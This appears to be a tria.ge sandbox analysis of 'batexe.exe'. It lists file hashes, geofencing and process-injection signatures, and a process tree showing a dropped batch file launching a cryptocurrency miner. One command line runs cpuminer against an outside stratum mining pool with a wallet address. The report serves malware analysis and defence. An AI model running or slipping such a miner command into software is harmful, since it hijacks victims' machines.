Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
299s -
max time network
306s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-ja -
resource tags
arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows -
submitted
20/02/2024, 12:29
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20240214-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20231215-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation batexe.exe Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation b2e.exe -
Executes dropped EXE 2 IoCs
pid Process 6092 b2e.exe 3116 cpuminer-sse2.exe -
Loads dropped DLL 6 IoCs
pid Process 3116 cpuminer-sse2.exe 3116 cpuminer-sse2.exe 3116 cpuminer-sse2.exe 3116 cpuminer-sse2.exe 3116 cpuminer-sse2.exe 3116 cpuminer-sse2.exe -
resource yara_rule behavioral2/memory/3120-9-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 3120 wrote to memory of 6092 3120 batexe.exe 85 PID 3120 wrote to memory of 6092 3120 batexe.exe 85 PID 3120 wrote to memory of 6092 3120 batexe.exe 85 PID 6092 wrote to memory of 464 6092 b2e.exe 86 PID 6092 wrote to memory of 464 6092 b2e.exe 86 PID 6092 wrote to memory of 464 6092 b2e.exe 86 PID 464 wrote to memory of 3116 464 cmd.exe 89 PID 464 wrote to memory of 3116 464 cmd.exe 89
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3120 -
C:\Users\Admin\AppData\Local\Temp\31F8.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\31F8.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\31F8.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:6092 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\3E2D.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:464 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3116
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
354KB
MD5ee53b0ba130e5b93372c8cd1c7d2b41d
SHA1098c02df090cb01d38542e4e9d16d22f33d91bd7
SHA256ce84fcd1d81d29df43a241f3865828e62554f28484b0992c7ebe77abc3a42067
SHA512df6244ff783105c5dc1bc28ac1ef0e903ceeb44b0890c81701440f82a11c0cf0bb982458f6c1dfd435aac7958faf2464efd1ba8a794ab8a96d06afd9f9181011
-
Filesize
1.4MB
MD578b79a524a304c93b16ea08338121452
SHA1a8ab9d89c40032d9c83877f1ff0844af2edae032
SHA25603825d0e09f14365212d88f5751ed6d5386c1595ebca5cc48d6a3cf64b754ded
SHA512082b9236d520ed1e201e0c2d6f7c3d70fad3b92e5e5015bfe488ecd7eb1b6546ea6bb2c5031c2c81a1f91f3ea2676e9202c00bad973666cffd27c885b20d1e6a
-
Filesize
896KB
MD51f22d8bf5f6c3dda3e880ea1ba0417d4
SHA12a8dbf2319999a894714bdea650eb5be32c64c19
SHA256afb7da96abe31529f462178372c48627a7e681e3c18cd2196aec8beee07f5b96
SHA512217b89f6a74039807c135539482b1a769d715190f7756e2b0162a33da3d8ada909b80ca3fc1596e542f163f6a45726282997f4e52a36c352cc89b9e58c1e6e05
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
898KB
MD5a3bbca6a5deada71d67e33f94593c62b
SHA10ca38479b5fc7292a05bb84f1d38c0d060daa19b
SHA256035fd42a7035ebaeb965fdd8ce02100334ae5b75ece84ad8a8a0172b0fbd7646
SHA512e50c0e0920d517a2f97f4f8166ba7f5ab662c8ccb156b0481372402acdf37af636c47ebd169674744bb76dbd829705a9e676a0150a4f22539db23388d1f89fad
-
Filesize
784KB
MD538938a24829e23215fa563b2e91c190c
SHA187b3371e54bd4915b9ad74aac78c7c14ae80ff4d
SHA256cb16a885ac5bf2d18d7e31eca3c5a51c6d1f736d0840b06c1dfecc693a1c4148
SHA512526e96d338f1ca49e7039ee0dd47e20f36134c101e113e2e97a425ee8bd6195d738146dacf00ce8f25593db13e0092cdff992c5392e064e4c64092ece7341891
-
Filesize
695KB
MD5b1df6c9e8542dece3195c68694994ad8
SHA12c51ce12e1a866127a799d25bf0f291c223fefa6
SHA2568e3ee03eb5b9dfcc64ae63b42f551d4840ee907790458756cbd391f17657839e
SHA5127351fa31dd608716866df33adc5105ec1b4f919d5f83c90bbd83d15c83d8917719066649406b1a114cde1bff05e1debba75c044adaa0a3d2ef16a8a7416d07b2
-
Filesize
570KB
MD5a21153c6fe5dae7980f97c9c3804f102
SHA1472b62c414c17af2f2dac170a85015a8ae30458b
SHA2567aae19eca2064804fdf238589ffa8ebaf2a632c42f584eae939d7a7499d9d877
SHA5125cac1256b4d61a59f1d2d5910757427ad290ff9107406a3ece44407e8419055af8cea28a348755620ec33994a70545e6736e574d302f5c311ee8f82e0317f879
-
Filesize
265KB
MD52ab5f5d68d20c7b97b96ee92dd86d861
SHA1bc17a24ce124ad952696983462069966acca47a4
SHA2562b008a02d8a154d4a72003765fdd071394c2f9c74aabab0c7d9baf543e5f3aeb
SHA512a27cb14ffcce7485077d2649fd3ade4795581ac61fcc2c5469548dd80be86df86d0259ec6cb701410844e0f18aa5088a6c92b2347ed22012ddc239d70878d0be
-
Filesize
729KB
MD560f10d2fe9146a32519e606bbc96a8d5
SHA171e0496b5d9ee07c32f940836b0d8edcea4beb5f
SHA2562b872ecb92e7177e39f53dce47a485dd0e392631518f9ba1609781d50aecc0bc
SHA51209b0d601e135dc697e0ccecd7b8f438c6f1801efb59d9e633a39b69d15363cc8e2f9646636648ee703e26451876bc172e56829e443871966e8551c7672b2d74e
-
Filesize
315KB
MD562a67567c12ff772ab47a137322df4b6
SHA1e389eb0cec33f2a4e69d2cfa8e4420a2d9b537d5
SHA256d8e57a43f2d6c68ff63faedfc787f3a395fb6c53a522fcbdeb0c923de489d67f
SHA51248954fe53c072e51c366d5390cc0d6655f387eee9eca8f4a62fbc206001543688ab4acb01f826c8fd6ef5bbba6bfc44959fb5960bdafc99171a57a10f9a993e7
-
Filesize
344KB
MD59613e770eb14ffad997f90af08fcff40
SHA1019bbab006583732dbdc506aeb49bbc5c907fecc
SHA256ab478b155133c185e4fffb27792addbdd0ae8c25eb6f6d1c06bc01b6596bab6b
SHA5123397d0da3e21eacb5e525cc93cb493fb60967b1288d52e9816c19630a4dd97ed087b42ced9ad00d9076cf346fd8ebd5fd4456b41bd74bc2ca0ce416c94036c11
-
Filesize
1.1MB
MD52cf3f9397ae75ba5e02f06e05dc3c9e4
SHA168e8f37569006f5b76e0e9716febfbce8fda62fa
SHA256ba709ca66621f0b8760f7949a3cd0eaab02d10384b38b2d6fa253d17b0efbedf
SHA512ee2a8c078eb1e491cda4b173ca8e09d1209999a0603289e6ecbf24dfa0a36ca856b754706f8b1231eb992d2280c25ee869845c5148ce4d9658765b7be1b5cb92
-
Filesize
828KB
MD5292e13f718219fa87f5e7f8c6fbc1747
SHA1786afb1b431b76019cfc01eec3c51a369276884c
SHA2567317d858b541078213169a66495bdfd2f33ab01c0ee79f6cf8330c6f6eae4737
SHA512332d496c678fa6239045ce2920fd6cc175e0787a577c47a041c3c36165d058265414fee9f88e9d6a2ed7a865ab6020736d23681361af8f1af8e94744a9fc9c00
-
Filesize
193KB
MD5534417b6a52fc870033ba31023f522f7
SHA196fc3a38fbc8dee93dbb2c9866260639d8da642c
SHA2566e7df3f453257062cc63af04d8bb65c7d6f8c0a573ae237eae490e8cdcf5d6e9
SHA5124fa6b3de5e570fdcd32b2a11ec3523d02489f531f479731d746f660f7ac2b9fdf0bb5c6f23d6b4ef3f6a2743d3cfaf942655a9ceab09b74c6e1fa6314ad98646
-
Filesize
280KB
MD5adff04394a948f6cfa144fed220e3649
SHA147c4d42cbd8dc2a41b406caca64dc31faf826a3c
SHA25655b6d61c22aab8979dfc6c69167622558f2bcdfc9c70962e4eab82a689a7cdbd
SHA512c00d575de47124fc1ec96be8bcdeee723321d5beb6bad7d13236f461e1d1c39145b1cd01e1cfa2a60940de4d6fed11ac2e07ebe6c63b55de40498a8bb12e2c35